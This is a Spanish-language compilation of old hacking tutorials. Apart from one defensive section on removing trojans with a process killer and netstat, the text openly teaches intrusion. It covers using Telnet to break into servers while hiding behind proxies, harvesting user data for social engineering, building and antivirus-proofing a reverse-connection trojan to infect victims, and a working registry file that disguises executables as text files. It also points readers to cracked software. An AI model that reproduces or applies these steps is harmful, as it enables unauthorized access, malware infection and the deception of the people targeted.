esta la irq de donde saque esta mierda y esta buenísima, deveria visitar web sites como este para ver http://lvlinotauro.galeon.com/enlaces912891.html
Telnet. Que es, como conectarse, usos en hacking.
esta muy bueno........
Autor: lvlinotauro
1-¿Qué es Telnet?
=============
Telnet es un conjunto de protocolos (reglas) que permiten que dos computadoras se conecten entre si, es decir que intercambien información. Al conectarse a un servidor mediante Telnet (comunmente utilizando el puerto 23), nuestra computadora pasa a ser una terminal del servidor al cual nos conectamos. Ésto significa que las órdenes que demos se ejecutarán en él y no en nuestra máquina, por lo tanto nos es posible correr aplicaciones que el servidor posee sin utilizar recursos de nuestra computadora (solo los utilizados por el modem para la conexión). Es la esencia del hacking, ya que nos permite controlar una computadora como si estuviéramos enfrente de ella (siempre y cuando obtengamos los accesos necesarios).
2-¿Qué se necesita para conectarse?
===========================
Lo primero a hacer es conseguir una "shell account" (cuenta shell), una cuenta en un servidor Unix que nos pemita encubrir nuestra identidad y así trabajar tranquilamente sin ser atrapados. Esto no es estrictamente necesario, sólo debe aplicarse si se piensa utilizar Telnet con fines malignos. Se puede conseguir una "shell account" gratuita en los siguientes sitios:
- www.cyberspace.org/shell.html
- www.grex.org
- www.arbornet.org/projects.html
- www.nyx.net
- www.nether.net
Otra buena medida a tomar en cuanto a seguridad se refiere, es esconderse detrás de un servidor Proxy. Esto será muy útil en caso de que el servidor que nos proporciona la "shell account" guarde un log con la informaión de todos los usuarios que se conectaron y, más aún, si llevan tambien un log de lo que estuvimos haciendo. No se olviden que el proxy al cual se conecten debe tener abierto el puerto 23, que es el que se utiliza para hacer Telnet (aunque diga que el proxy se puede utilizar sólo mediante un puerto determinado, prueben utilizando el puerto 23). A continuación una lista de sitios dónde se pueden encontrar proxys:
- http://cavency.virtualave.net/prox
- http://mvlad.newmail.ru/proxiesn.htm
- www.lightspeed.de/irc4all/index.htm
- http://www.magusnet.com/proxy.html
- http://forbidden.net-security.org/htm/misc/proxies.htm
- http://home6.swipnet.se/~w-61609/Proxies.htm
- http://lpwa.com:800
Por último, algo fundamental para poder conectarse es un programa para tal fin. En windows 95-98 se incluye uno pero, como todo lo de Micro$oft, es una porquería. ¿Por qué es una porquería?, porque no nos permite ver lo que estamos escribiendo y tampoco borrrar si cometemos algún error, es decir, no solo tenemos que escribir a ciegas con temor a equivocarnos, ¡sino que tampoco podemos arreglarlo! Por eso es mejor utilizar otro de los miles de programas que andan sueltos por la red, cómo el CRT, el cual les recomiendo y el cual pueden bajar de nuestro sitio (www.sweetdevils.com.ar, sección "downloads") junto al crack necesario para arreglar ese bug molesto conocido como "Trial" o "Bug de los 30 días".
3-¿Cómo conectarse?
=================
Lo primero es la configuración del proxy, en caso de no considerar necesaria esta medida de seguridad, pasen al siguiente paso. De lo contrario, sigan las siguientes indicaciones:
1- Ir a [Mi PC]----> [Panel de Control]----> [Opciones de Internet].
2- Hacer click en la pestaña de [Conexiones], seleccionar la conexión de Internet a usar y hacer click sobre el botón de [Configuración].
3- Habilitar el uso de un servidor proxy haciendo click en [Usar Servidor Proxy].
4- En el cuadro de [Dirección] colocar el nombre completo del proxy a utilizar y, en la casilla contigua, el puerto a utilizar (en éste caso el 23).
5- Salir de [Opciones de Internet] haciendo click en aceptar.
¡Ya está lista la configuración del proxy!
El paso a seguir es conectarnos a nuestra "shell account" mediante Telnet.
Windows: si son fanáticos defensores de Bill y de todas sus creaciones y quieren utilizar el "programa" que les proporciona, hagan lo siguiente:
1- Ir a [Inicio]---->[Ejecutar]. Tipear c:/windows/telnet.exe (o el directorio en el que este la carpeta de windows).
2- Una vez abierto el programa, hagan click en [Conectar]----> [Sistema Remoto...].
3- Ingresen el [Nombre del Host] (Hostname), la dirección que les dieron al subscribirse a la "shell account".
4- En [Puerto], seleccionen [Telnet], y en [Tipo de Terminal], dejen la predeterminada (vt100) a menos que les hallan indicado otra cosa al subscribirse a la "shell account".
5- Hagan click en [Conectar] y listo.
CRT: Este excelente programa no solo nos permite ver lo que escribimos y borrar cualquier error que surja de nuestras estúpidas manos, sino que también posee excelente utilidades, como la posibilidad de ejecutar scripts o establecer atajos de teclado. Su uso no difiere mucho del anterior, sin embargo vamos a detallarlo por las dudas de que alguna persona que no posea más de media neurona quiera leer este e-zine ;).
1- Ir a [Files]----> [Connect]. Una vez allí pueden o crear una nueva sesión y configurar todas sus opciones, o optar por lo más sencillo y menos cansador (no valla ha ser que se "stressen") haciendo click en la pestaña de [Quick Connect] (Conectarse Rápido).
2- Al igual que en el programa de Bill, ingresamos el hostname de nuestra "shell account" y el puerto al que nos conectaremos, el 23. El Tipo de Terminal será el predeterminado (vt100), si quieren cambiar esto, deberan iniciar una sesión y configurarlo mediante [Edit]----> [Emulation].
3- Hagan click en conectar y listo.
4- ¿Cómo conectarse a otra máquina a travéz de una "shell account"?
====================================================
Una vez que nos conectemos a nuestra "shell account" nos pedirá que ingresemos nuestro username y password, ingresamos los datos requeridos y ya estamos listos para trabajar.
El comando a escribirse para conectarse a el servidor de la víctima es "telnet", y su sintáxis es la suiguiente :
telnet hostdelavictima puerto
Telnet: ingresando éste comando le ordenamos al server que realize un telnet a otra máquina, es decir, que nos conecte a ella.
HostdelaVictima: aquí ingresamos la dirección de la víctima, ya sea un número IP o un nombre DNS.
Puerto: ingresamos el puerto al cual nos queremos conectar (a continuación hay una lista de los puertos más comunes).
Por ejemplo, si yo quisiera conectarme al FTP de ciudad.com.ar escribiría lo siguiente:
telnet ciudad.com.ar 21
5-Lista de Puertos.
==============
9---> Discard Dev/Null : Basura
11---> Systat: Información sobre el estado del sistema.
15---> Netstat: Nos da información, en tiempo real, sobre las conexiones que realiza el servidor.
21---> FTP (File Transfer Protocol): Transferecnia de archivos.
23---> Telnet: nos permite ingresar remotamente a un servidor ( generalmente nos pide username y password).
25---> SMTP (Simple Mail Transfer Protocol):es el puerto utilizado para enviar e-mails.
37---> Time: Hora del sistema.
43---> Whois: nos da información sobre los usuarios del sistema.
70---> Gopher: Buscador de información.
79---> Finger: muestra la lista de ususarios conectados al sistema.
80/8080---> Http (Hypertext Transfer Protocol): Servidor Web.
8080/5580->Http Militar.
110--> Pop3 (Post Office Protocol 3): es el puerto utilizado para resivir e-mails (correo entrante).
119--> NNTP: Usenet News Groups, grupos de noticias de Usenet.
117--> UUCP (Unix To Unix Copy): Es un protocolo utilizado para copiar archivos de un servidor/máquina Unix a otra.
443--> Shttp (Secure HTTP): Servidor web "seguro".
513--> rlogin: Remote Login, login remoto.
6-Comandos.
=========
Los comandos de telnet varían de máquina en máquina, y se los puede consultar ingresando los comandos "help" , "man" o "?". Sin embargo, hay una serie de comandos que son comunes a todas las máquinas (o a casi todas):
telnet> open (hostname) : para conectarnos a otra máquina por medio de telnet.
whois> (nombre del usuario): nos da información sobre el usuario.
finger> (nombre del usuario): nos dice si ese usuario está conectado y, si lo está, nos dice que está haciendo, sino lo esta nos dice cuando se conectó por última vez.
sys : nos da información sobre el sistema (ej:qué sistema operativo corre).
quit : cierra la conexión.
7-Usos del Telnet en el hacking.
=======================
El Telnet es básicamente (lo repito) la esencia del haching, sin él no nos sería posible conectarnos remotamente a otra computadora y manejarla como si la tuviéramos enfrente, ya que es imposible realizar ésto mediante la World Wide Web o mediante el correo, por ejemplo, porque estos servicios solo utilizan un puerto determinado y sólo nos dejan realizar ciertas tareas en la máquina remota.
Hackear un Servidor: El Telnet se utiliza fundamentalmente para entrar de forma ilegal a un servidor. Ésto se realiza mediante la búsqueda de fallas de seguridad (bugs) en todos los puertos de la máquina y mediante la explotación de esas fallas (exploits). Generalmente se utilizan fallas de seguridad conocidas y se trata de ver si ese servidor sigue siendo vulnerable a ella o si ya ha sido arreglado (los administradores del sistema suelen ser muy perezosos o ignorantes y no se informan correctamente de las nuevas fallas de seguridad existentes). Se pueden encontrar información sobre fallas recientes o pasadas en los siguientes sitios:
- www.securityfocus.com
- http://www.anticode.com
- http://www.technotronic.com
- http://www.hack2600.com
- http://home.cyberarmy.com/tcu/underground.html
- http://www.rootshell.com
Whois (puerto 43): Se lo utiliza para obtener información sobre los usuarios del sistema, y así convencerlos, mediante ingeniería social, que nos den su password, o diréctamente meterles un troyano con el mismo propósito.
Modo de uso: Conectarse al puerto 43 y ejecutar el comando [whois nombre_del_usuario_deseado] o, diréctamente [whois] (nos dará info del sistema, posiblemente del administrador o de la empresa dueña del server).
Finger (puerto 79): Nos dice quienes estan conectados al sistema y que estan haciendo en ese momento. Aquí encontraremos victimas para el "whois".
Modo de uso: Conectarse al puerto 79 y ejecutar el comando [finger] ésto nos dará información sobre todos los usuarios del sistema. Si se quiere obtener información sobre un usuario particular, hacer [finger nombredeusuario] o [finger e-maildelusuario].
Forge Mail (puerto 25): Se lo utiliza para mandar correos anónimos ( para más información, ver el artículo de Ingeniería Social en el N°1 de Datacode).
Netstat y Systat (puertos 15 y 11): Ambos nos brindan información del sistema, lo cual es muy útil a la hora de buscar fallas de seguridad y/o de explotarlo.
El primero nos brinda información sobre el sistema en general: que sistema operativo usa y que versión, en qué máquina está corriendo, cuando se lo actualizó por última vez, etc. En cambio, el segundo nos da información sobre la conexiones llevadas a cabo por el servidor en ese momento, lo cual es útil por lo siguiente: generlamente, las máquinas que están conectadas entre si permanentemente o de forma seguida establecen una "política de confianza" (Trust policy) , que permite que se pueda saltar de un servidor a otro sin tener que ingresar ninguna contraseña adicional. Ésto lo hacen para ahorrar tiempo al realizar las conexiones y para que sea más cómodo trabajar. Esto nos sirve porque los servidores conectados a la máquina víctima pueden ser menos seguros y, si logramos ingresar a alguno de ellos, podremos acceder a nuestro objetivo sin tener que pasar por ningun control de seguridad.
-------------------------------------------------------------------------------
Saludos a todos.
------------------------> lvlinotauro <--------------------------
-------------------> lvliracle@hotmail.com <---------------------
Como desembarazarse rápidamente de un troyano
===============================
Autor: lvlinotauro
En esta página vamos a hablar de Mataprocesos
Este pequeño programa, (hecho cuando comenzó el furor del Back Orifice) se llama "MataProcesos" y es una pequeña utilidad que cumple la función que debería estar incluída en la ventana de CTRL-ALT-DEL. Curiosamente esta utilidad tan "pequeña" (ocupa 40 Kb y cumple una tarea muy sencilla) nos será de enorme ayuda con el tema de la seguridad.
Cuando uno ejecuta el MataProcesos un icono (una señal de STOP) se coloca en la barra de tareas. si queremos cerrar un programa rapidamente (alguno que se colgó, o de esos que no aparecen en el CTR-ALT-DEL, como por ejemplo UN BACKDOOR como el patch del NetBus, si es que algun "vivo" nos lo metió) haremos doble click en el STOP y se abrirá una ventana con un listado de todos los procesos reales que se están ejecutando en el momento, listados por nombre de archivo ejecutable.
Para cerrar (matar) un proceso, basta con hacer doble click en el item de la lista que lo representa, y responder que SI a la pregunta que MataProcesos nos hace cuando pide la confirmación.
Notemos que dije que con MataProcesos podemos matar a "todos los procesos", lo cual incluye también a los procesos vitales del Windows, por lo que la primera vez, por falta de experiencia, podriamos "matar" al Windows mismo, obligándonos a reiniciar el ordenador.
Este programa es útil, por ejemplo, si estamos siendo víctima de un troyano, es decir, alguien nos está "molestando", mostrando mensajes extraños en nuestra pantalla sin nuestra autorización, mostrandonos imágenes y abriendo y cerrando la bandeja de nuestro CD-ROM...
Usando el MataProcesos para sacarnos de un apuro
En ese caso, estamos frente a un auténtico "Lamer" (que vendría a ser algo así como un tonto que quiere ser Hacker y utiliza programas como el NetBus, Back Orifice, Sub Seven, Donald Dick o NetSphere para asustar o abusarse de los que no saben). ¿Cómo llegó hasta aquí este individuo? El, u otro similar a él, nos pasó un archivo EXE o SCR haciendonos creer que se trataba de algo muy interesante, y cuando (incautos) lo ejecutamos... probablemente no pasó nada, o algo no muy interesante que digamos... Pero en realidad lo que ocurrió fué que acabamos de instalar un "control remoto" para que este "Lamer" pueda controlar nuestro sistema a su antojo. Fuimos vilmente engañados. Ejecutamos, sin saberlo, un troyano.
Tenemos que apurarnos a quitarnoslo de encima, porque por el momento también tiene acceso a nuestros archivos, para robarlos o borrarlos.
El modo de usar el MataProcesos en este caso sería simplemente seleccionar el proceso adecuado (el del troyano) y terminarlo.
Cómo reconocemos al troyano? Bueno, suponiendo que la lista que MataProcesos nos muestra es la siguiente:
C:WINDOWSSYSTEMKERNEL32.DLL
C:WINDOWSSYSTEMMSGSVR32.EXE
C:WINDOWSSYSTEMmmtask.tsk
C:WINDOWSEXPLORER.EXE
C:WINDOWSTASKMON.EXE
C:WINDOWSSYSTEMSYSTRAY.EXE
C:WINDOWSPATCH.EXE
C:WINDOWSWINDOW.EXE
C:WINDOWSSYSTEM .EXE
C:WINDOWSSYSTEMNSSX.EXE
C:WINDOWSRNAAPP.EXE
C:WINDOWSTAPISVR.EXE
C:ARCHIVOS DE PROGRAMAICQICQ.EXE
C:ARCHIVOS DE PROGRAMAOUTLOOK EXPRESSMSIMN.EXE
C:ARCHIVOS DE PROGRAMAMATAPROCESOSMATAPROCESOS.EXE
En este caso nos encontramos con un ordenador LLENO DE TROYANOS, es decir, su seguridad ha sido totalmente violada. ¿Cómo nos damos cuenta de eso?
Hace falta estar acostumbrado al MataProcesos, en otras palabras, saber el proceso que cada archivo está ejecutando.
Si tenemos en cuenta que es muy dificil que un troyano se instale en otro lado que no sea los directorios WINDOWS o SYSTEM, ya descartamos tres posibilidades (las tres últimas, pero es más seguro descartarlas cuando conocemos la función de cada una de ellas), veamos:
C:ARCHIVOS DE PROGRAMAICQICQ.EXE
es ni más ni menos que el ICQ, si lo matamos, se nos cierra el ICQ.
C:ARCHIVOS DE PROGRAMAOUTLOOK EXPRESSMSIMN.EXE
se trata, como se podrán imaginar, del Outlook Express.
C:ARCHIVOS DE PROGRAMAMATAPROCESOSMATAPROCESOS.EXE
este es tanto o más obvio que los anteriores, nosotros mismos acabamos de ejecutarlo.
También hay que conocer otros procesos comunes de Windows, ¿y cómo lo hacemos? si se trata de algunos de los que ya nombré, yo mismo voy a presentarselos, pero si son otros que no se mustran aquí, probablemente con el método de "prueba y error".
Veamos:
C:WINDOWSSYSTEMKERNEL32.DLL
Este es el "corazón" del Windows, si lo cerramos, tendremos que reiniciar.
C:WINDOWSSYSTEMMSGSVR32.EXE
Este es una utilidad interna, si la cerramos el sistema probablemente pierda estabilidad.
C:WINDOWSSYSTEMmmtask.tsk
Cerrar este es imposible. Siempre vuelve a aparecer. Tiene que ver con las tareas multimedia que el Windows realiza.
C:WINDOWSEXPLORER.EXE
Se trata del explorador. Gestiona tanto al Internet Explorer como al Windows Explorer. También gestiona la barra de tareas. Si lo cerramos se nos cierran estas tres cosas. (Generalmente se vuelve a ejecutar automáticamente)
C:WINDOWSTASKMON.EXE
Es el monitor de tareas de Windows. Si lo cerramos aparentemente no ocurre nada, pero no recomiendo cerrar procesos sin saber exactamente qué función cumplen, a menos que no nos moleste vernos obligados a reiniciar...
C:WINDOWSSYSTEMSYSTRAY.EXE
Es el "parlantito" (la bocinita) que aparece en la barra de tareas, el programa que nos dá el control del volumen de sonidos de Windows. Si lo cerramos, el parlante (la bocina) desaparece.
C:WINDOWSRNAAPP.EXE C:WINDOWSTAPISVR.EXE
Estos dos son los que se ejecutaron cuando nos conectamos a Internet. Si los cerramos la conexión se corta y no podremos volver a conectarnos hasta reiniciar la computadora.
Pues bien, ¿qué nos queda?
C:WINDOWSPATCH.EXE C:WINDOWSWINDOW.EXE C:WINDOWSSYSTEM .EXE C:WINDOWSSYSTEMNSSX.EXE
¡Ja! se trata ni más ni menos que de ¡cuatro troyanos! Toda una exageración... Nuestra seguridad (la de nuestros archivos) se ve totalmente violada por culpa de cada uno de estos procesos... ¿Cómo podemos estar seguros de que se trata de troyanos? Eso lo explico en el apartado que viene, pero en el caso de estos cuatro, basta con decir que ya son tán famosos que no hace falta hacer las comprobaciones...
C:WINDOWSPATCH.EXE
es el maldito patch del NETBUS
C:WINDOWSSYSTEM .EXE
es el servidor del Back Orifice
C:WINDOWSSYSTEMNSSX.EXE
es el servidor del NetSphere
C:WINDOWSWINDOW.EXE
es un troyano, aunque no sé exactamente cuál... (probablemente SubSeven o una versión levemente modificada del NetBus)
Matando a LOS CUATRO podemos continuar navegando tranquilos, ya que el agresor perdió totalmente su poder. PERO CUIDADO, nuestro sistema seguramente fué modificado para que estos programas se ejecuten cada vez que arrancamos, y como el MataProceso no los borra del disco, sino simplemente los erradica de la memoria, no estamos a salvo de que la próxima vez que reiniciemos ¡los troyanos estén nuevamente allí!
Para librarnos de ellos para siempre leamos los siguientes puntos...
Aclaraciones:
Para que el MataProcesos funcione hace falta tener instalados los ’æruntimes’æ de Visual Basic 5. Si no los tenés los podés conseguir en:
ftp://ftp.simtel.net/pub/simtelnet/win95/dll/vb500a.zip
o en el mirror: ftp://ftp.cdrom.com/pub/simtelnet/win95/dll/vb500a.zip
2) Mataprocesos y Netstat, suficiente para erradicar cualquier troyano
Existe una aplicación llamada Netstat, y está ubicada en C:WINDOWS. Con ella y la ayuda del MataProcesos podemos limpiar nuestra PC de troyanos.
Para hacerlo correctamente hay que seguir los siguientes pasos:
a) Nos desconectamos de Internet
b) Cerramos todas las aplicaciones que utilicen conexiones a Internet, por ejemplo: ICQ - Internet Explorer o Netscape - GetRight - Go!Zilla - Telnet - mIRC - MSChat - Outlook - Outlook Express - etc...
c) Ejecutamos el MataProcesos
d) Ejecutamos una ventana de DOS
e) En la línea de comandos del DOS tecleamos "netstat -a" y tomamos nota de todos los "puertos" que aparecen como "abiertos", estos aparecen en la columna "Dirección local" con el formato: :
Por ejemplo, podríamos tener el siguiente listado:
Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:30100 0.0.0.0:0 LISTENING
TCP Donatien:30101 0.0.0.0:0 LISTENING
TCP Donatien:30102 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Lo cual significa que tenemos procesos en nuestro ordenador que están esperando conección en los puertos: 6711, 6776, 30100, 30101, 30102, 1234, y 1035.
f) Comenzamos a matar, uno por uno, los procesos que no sabemos que función cumplen. Si matamos alguno que no debíamos, y el ordenador se bloquea, ya sabemos para la próxima vez que ese proceso no es un troyano, y que no hay que matarlo
Ejemplo: decido matar al proceso llamado:
C:WINDOWSSYSTEMNSSX.EXE
que es muy sospechoso...
Acto seguido, volvemos a la ventana de DOS y pedimos otro listado de "Netstat -a", que nos devuelve lo siguiente:
Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Por suspuesto!!! Se han cerrado tres puertos!! (30100, 30101 y 30102, que ya no aparecen en el listado) Al estar seguros que NSSX.EXE no pertenece a ningún programa que nosotros hayamos instalado, y de que el sistema continúa ejecutándose sin ningún problema (o sea que no era parte del Windows), podemos cambiarle el nombre al archivo para que no se vuelva a ejecutar la próxima vez que reiniciemos. Para eso usamos el comando "RENAME C:WINDOWSSYSTEMNSSX.EXE C:WINDOWSSYSTEMNSSX.EX_".
Nótese que tán solo le cambiamos la extensión, para, en caso de habernos equivocado, recuperar el archivo fácilmente.
Podemos renombrar al archivo debido a que ya lo matamos. Si el proceso estuviera ejecutándose no podríamos modificar ni borrar el NSSX.EXE
Otro modo de cambiarle el nombre es ir con el Explorador hasta el directorio C:WINDOWSSYSTEM, buscar el archivo NSSX.EXE y situados sobre él presionar F2, escribir el nuevo nombre y .
Ahora, aunque no es del todo indispensable, y no es recomendable para los novatos absolutos, podríamos abrir el registro de windows con el REGEDIT y eliminar la entrada que antes ejecutaba el troyano cada vez que encendíamos la máquina. La entrada está dentro de la rama: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun y es la siguiente: "NSSX" y su valor es "C:WINDOWSsystem ssx.exe"
Para borrarla basta con marcarla con el mouse, pulsar DEL, y confirmar.
Es importante no andar borrando cualquier cosa del registro. Para aprender más sobre qué es el registro y qué programas ejecuta Windows al arrancar, lean la emisión Nro. 16 de esta misma revista en http://dzone.findhere.com . Allí también aprenderán que la rama del registro "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun" no es el unico lugar en el cual un troyano puede asegurarse el ser ejecutado en cada sesión.
El caso de este ejemplo se trataba del famoso NetSphere, un troyano bastante nuevo, que se puede descargar de http://angelfire.com/ar/NetSphere/index2.html . Pueden usarlo para practicar, pero por favor, no sean "Lamers", no lo usen con otras personas, porque dejarían sus máquinas a merced de cualquiera, y si lo usan con ustedes mismos, tengan en cuenta de que no deben conectarse a Internet mientras tengan el troyano instalado. (justamente, para evitar eso es que explico todo esto).
Sigamos con otro ejemplo, sabemos que la lista del "Netstat -a" es ahora más corta:
Proto Dirección local Dirección remota Estado
TCP Donatien:6711 0.0.0.0:0 LISTENING
TCP Donatien:6776 0.0.0.0:0 LISTENING
TCP Donatien:1243 0.0.0.0:0 LISTENING
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Pues bien, ahora procedamos a cerrar el proceso: C:WINDOWSWINDOW.EXE
El sistema sigue perfectamente estable, y volvemos a pedir el "Netstat -a" y...
Proto Dirección local Dirección remota Estado
TCP Donatien:1035 0.0.0.0:0 LISTENING
UDP Donatien:1035 *:*
Ohhhhh!! Se han cerrado otros tres puertos! (aclaro que un troyano no necesariamente utiliza 3 puertos, puede utilizar más, o menos).
Próximo paso: renombramos el archivo para que no vuelva a ejecutarse nunca más, vamos a la ventana de DOS, y escribimos: "RENAME C:WINDOWSWINDOW.EXE C:WINDOWSWINDOW.EX_"
Como ya dije, también podemos eliminar la entrada del registro que lo ejecuta, pero como, habiendo renombrado el archivo, ya no es necesario, lo dejo librado al lector.
Como en mi caso, por experiencia, sé que el puerto 1035 no se trata de un troyano, no voy a continuar matando procesos, pero si tuviera más puertos abiertos, (en el ejemplo que dí al principio había cuatro troyanos y no dos) continuaría haciendolo hasta encontrarlos todos.
Quiero aclarar que no es muy comun que un ordenador esté lleno de troyanos como en estos ejemplos, pero si notan que alguien está molestándolos de un modo extraño cuando entran a Internet, intenten con esta "limpieza".
Otra aclaración: Si matan procesos que no son troyanos NO HAY PROBLEMA, lo peor que puede ocurrir es que tengan que reiniciar la máquina. Sólo asegurense de no tener archivos sin grabar (como un documento de Word) para no perderlo, al momento de estar haciendo estas comprobaciones.
También cabe aclarar que, aunque yo no conozco ninguno, pueden existir troyanos más "inteligentes", que no tengan puertos abiertos cuando no estamos conectados, a esos hay que detectarlos por un método diferente, o bien, intentar hacerlo mientras estamos conectados a Internet (aunque en ese caso la cosa se complicaría debido a los demás programas que utilizan Internet -como el ICQ- y abren a su vez sus propios puertos, con lo cual la lista se hace más difícil de interpretar).
Y OTRAS COSAS
Cómo crear un virus troyano
Introducción
En este tutorial vamos a aprender a crear un virus troyano. Pero primero, como muchos se preguntaran, ¿qué es un virus troyano?
Un virus troyano es un virus con el que puedes manejar el ordenador de tu víctima (la persona a la que infectes) como si fuera el tuyo. Podrás bajarte archivos de su ordenador, subirle archivos, abrirlos tanto en tu ordenador como en el suyo, finalizarle procesos, etc. Todo lo que puedes hacer lo veremos más adelante.
Tipos de troyanos
Se pueden diferenciar dos tipos de troyanos, dependiendo de cómo se conecten a nuestro ordenador:
De conexión directa, con los que sacamos el ip de la víctima y a través de ésta nos conectamos a su ordenador. El problema es que los ips no suelen ser fijos, suelen cambiar cada vez que enciendes el ordenador, por lo que tenemos que sacar el ip cada vez que querramos conectarnos.
De conexión inversa, con los que no tenemos que sacar el ip a la víctima, ya que una vez que ejecuten el troyano se conectarán automáticamente cada vez que enciendan el ordenador.
Lógicamente los mejores son los de conexión inversa, y por lo tanto son los que os enseñaré a hacer.
Partes de un troyano
En un troyano se pueden diferenciar dos partes: el servidor y el cliente.
El servidor es el virus en sí, el archivo que debe abrir la víctima en su ordenador para infectarse y que una vez infectada se conectará con el tuyo.
El cliente es el archivo que debes abrir en tu ordenador para controlar remotamente el de tu víctima.
Una vez dicho esto, vamos a proceder a crear nuestro troyano.
1. Conseguir una no-ip
Una vez que infectes a alguien podrás controlar su ordenador gracias a que el virus (si es de conexión inversa) manda la información a tu ip, recibiéndola en tu ordenador. Pero aquí hay un problema, como hemos dicho antes las ips no suelen ser fijas, por lo que acabarías perdiendo la conexión con tu víctima. Logicamente la solución a este problema es crear una ip estática (que siempre sea la misma) y dirigirla a tu ordenador, y ésta es conocida como no-ip. Podrás ver como se crea una no-ip en el manual de Cómo conseguir una no-ip.
2. Crear el troyano con bifrost
Hay muchos virus troyanos de conexión inversa, entre los que los mas famosos son el bifrost y el poison, pero hay muchos más como el pro rat, el slh4, el coolvides, etc.
Aquí vais a aprender a crear el bifrost por ser el más famoso, para ello ir al manual bifrost.
3. Hacer el virus indetectable
Está claro que el virus así no se lo vamos a colar a nadie, porque lo detectan todos los antivirus, por lo que vamos a hacerlo indetectable. Podeis ver como hacerlo indetectable en: Hacer tu server indetectable
4. Camuflar el virus
Ya sólo nos queda meterle el virus a quien nos caiga mal, pero el virus no se lo podemos mandar tal cual porque se dará cuenta aunque el antivirus no lo detecte. Lo que vamos a hacer es incluirlo en un archivo de forma que cuando lo ejecute se abran los dos, el archivo y el virus. El problema es que el archivo resultante será .exe, aunque al abrirlo sea una imagen o un video, por lo que será mejor pensar bien cómo pasarle el virus a nuestra víctima. Para ver como camuflar el virus ve a camuflar el server.
HACKING
Ocultación y creación de Troyanos
OCULTACIÓN DE TROYANOS
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Aunque no sea muy habitual, es posible hacer pasar un troyano (virus, o cualquier otro ejecutable) por un archivo de texto (.txt), de audio (.wav), una carpeta, o cualquier otro tipo de archivo (si!, cualquiera).
Estos archivos son en realidad troyanos, y como puedes ver parecen archivos inofensivos.
Vamos a ver como se consigue hacer pasar un ejecutable por cualquier otro archivo en apariencia inofensivo.
La técnica consiste en "contaminar" el sistema, de manera que una vez infectado, sea vulnerable a este método y sea él mismo el que haga parecer a los archivos maliciosos, archivos totalmente inofensivos.
Increíblemente se trata de un método facilísimo.
Vamos a explicar paso a paso como se hace, para poder así saber como tenemos que protegernos de este posible ataque.
Lo que vamos a hacer es crear una extensión nueva, darle características de ejecutable, y ocultarla, crearemos en este ejemplo la extensión ".troj" .
De esta forma lo que nosotros tenemos es un archivo, por ejemplo, "server.exe", al que le hemos puesto el icono propio del txt, lo renombramos a "server.txt.troj", tras "contaminar" el sistema de la víctima, la extensión .troj, no solo será reconocida como ejecutable, sino que incluso desaparecerá, y por lo tanto lo que tendremos como resultado será un archivo server.txt (que se puede renombrar como readme.txt por ejemplo) en el que al hacer click se ejecutará el "server.exe".
CREANDO LA EXTENSIÓN :
Antes de pensar en otras cosas, lo primero es saber como podemos hacer que se cree nuestra extensión en el PC de la víctima.
Para crear una extensión, es necesario añadir las claves adecuadas al registro, y para ello se utilizan los archivos ".reg"
En este punto vamos a diferenciar entre Windows98 y Windows NT/2000/XP, puesto que hay ciertas cosas que varían entre uno y otro, el ejemplo que vamos a crear está pensado para que funcione en NT/2000/XP, para Windows98 no tiene mayor complicación, pero hay que cambiar algunas cosas.
Con estas líneas añadimos lo que necesitamos al registro:
REGEDIT4
[HKEY_CLASSES_ROOT.troj]
@="trojfile"
[HKEY_CLASSES_ROOTtrojfile]
@="Documento de texto"
"NeverShowExt"=""
[HKEY_CLASSES_ROOTtrojfileShellOpenCommand]
@=""%1" %*"
Vamos a explicarlo un poco para el que no lo entienda:
REGEDIT4
Es la cabecera que indica que es un archivo de registro, dependiendo del sistema, también podría poner "Windows Registry Editor Version 5.00", según la versión.
[HKEY_CLASSES_ROOT.troj]
Añadimos a la clave HKEY_CLASSES_ROOT la extensión ".troj", en HKEY_CLASSES_ROOT, se encuentra el registro de todas las extensiones y los tipos de archivo conocidos por nuestro sistema.
@="trojfile"
La "@" se utiliza para añadir claves con el valor de (Predeterminado)
"trojfile" es el tipo de archivo al que pertenecerán los archivos con extensión ".troj"
Para que lo entiendas mejor, abre el regedit32.exe, y ve hasta HKEY_CLASSES_ROOT, verás que la extensión, por ejemplo, ".txt" está asociada con los "txtfile", la ".exe" está asociada con los "exefile" etc.
[HKEY_CLASSES_ROOTtrojfile]
Añadimos el tipo de archivo "trojfile"
@="Documento de texto"
Esta es la clave que define a los "trojfile" (los ".troj") como documentos de texto, gracias a ello, cuando alguien vea las propiedades del documento, verá en "Tipo de archivo:" el valor "Documento de texto".
"NeverShowExt"=""
Esta clave es un punto fundamental en el proceso, añadiendo esta clave a cualquier tipo de archivo conseguimos que la extensión del archivo desaparezca.
La clave "NeverShowExt" es la responsable de que cierto tipo de extensiones no se vean.
Estas son las extensiones que permanecen invisibles:
.cnf
.lnk
.pif
.scf
.shb
.shs
.url
El hecho de que estas extensiones permanezcan ocultas se debe a que poseen la clave en el registro "NeverShowExt". Todas las extensiones que tengan este atributo en el registro, permanecerán invisibles en Windows aunque lo tengamos configurado para ver todas las extensiones.
Por lo tanto nosotros la añadiremos a nuestro tipo de archivo para hacer desaparecer nuestra extensión.
[HKEY_CLASSES_ROOTtrojfileShellOpenCommand]
Esta es la ruta en la que hay que poner qué programa se utilizará para abrir ese tipo de archivo.
@=""%1" %*"
Esto indicará que se abra como cualquier otro ejecutable, en este punto es donde se define, por ejemplo que los .txt se abran con el notepad.exe poniendo algo así:
@="%SystemRoot%system32NOTEPAD.EXE %1".
Bien, metiendo todo esto en un ".reg" ya tenemos lo que buscábamos. Al pinchar sobre el ".reg" se añadirá automáticamente la nueva extensión al registro, y el archivo "server.txt.troj" se transformará en "server.txt" (con el icono del txt porque anteriormente habíamos modificado el "server.exe" para que llevara este icono).
